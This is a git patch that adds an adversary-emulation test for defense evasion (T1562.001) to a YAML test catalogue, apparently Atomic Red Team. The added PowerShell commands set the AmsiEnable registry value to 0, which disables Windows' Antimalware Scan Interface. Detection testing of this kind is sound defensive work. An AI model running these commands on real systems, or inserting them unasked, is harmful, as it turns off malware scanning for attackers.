From fbe8663f4955915cfa5adf1a3bfb34dc21bccdef Mon Sep 17 00:00:00 2001
From: NeuralGlitch <107919127+NagaSivaGunturu@users.noreply.github.com>
Date: Thu, 30 May 2024 05:10:55 +0530
Subject: [PATCH] Update T1562.001.yaml (#2788)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1562.001/T1562.001.yaml | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 67f54289..1167b8ca 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -1135,4 +1135,18 @@ atomic_tests:
       Remove-ItemProperty -Path $registryPath -Name $newValueName
       Write-Host "Registry value deleted: $newValueName"
     name: powershell
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true
+- name: AMSI Bypass - Create AMSIEnable Reg Key
+  description: |
+    Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0.
+    Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Force | Out-Null
+      New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name "AmsiEnable" -Value 0 -PropertyType DWORD -Force | Out-Null
+    cleanup_command: |
+      Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null
+    name: powershell
+    elevation_required: true